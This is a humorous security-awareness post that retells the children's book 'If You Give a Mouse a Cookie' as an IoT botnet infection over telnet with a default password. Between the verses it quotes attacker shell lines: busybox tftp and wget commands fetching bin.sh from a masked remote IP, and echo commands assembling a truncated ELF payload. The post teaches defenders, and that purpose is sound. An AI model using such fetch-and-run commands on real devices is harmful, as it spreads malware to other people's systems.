In the interest of making security approachable, I’ve decided to attempt to bring proper security methodology down to a level that everyone can understand. Because my four-year-old niece lives with us, we’ve got a ton of children’s books lying around for inspiration. I decided to try passing along a little security knowledge by mimicking the style of the beloved children’s classic, If You Give a Mouse a Cookie.
If you leave a hacker a default password,
He'll use it to log into your telnet server.
Once he's logged into your telnet server,
host login: root
he'll want to install some new software.
He'll try to download something via TFTP,
# busybox tftp 185.xx.xxx.xxx -c get bin.sh
tftp: applet not found
but that won't work, so he'll try WGET.
# busybox wget 185.xx.xxx.xxx -c get bin.sh
wget: applet not found
That won't work either, so he'll resort to creating
a file all by himself.
# echo -en '\x7f\x45\x4c...\x01\x00\x00\x00\xa4\x00' >> retrieve && echo -en '\x52\x43\x56'
# echo -en '\x01\x00\x34...\x28\x00\x06\x00\x05\x00' >> retrieve && echo -en '\x52\x43\x56'
# echo -en '\x00\x00\x00...\x01\x00\x00\x00\x00\x00' >> retrieve && echo -en '\x52\x43\x56'
Once he's created that file, he'll want to run it.
Once its running, it'll download another one of the hacker's files.
He'll want to run that one too.
Once it's running, it will start attacking other
systems on the Internet.
While its attacking other systems on the Internet,
it might come across Tom's Telnet Mirror™.
If the code attacks Tom's Telnet Mirror™, it'll redirect
the attack right back to your system.
And, chances are, if the attack is reflected right back to your system,
it'll probably try logging in using a default password.
host login: root
With apologies to Laura Numeroff
If you have young'uns, seriously consider buying the original... they'll love it.
And for Pete's sake... change those frickin' passwords, mmmmkay?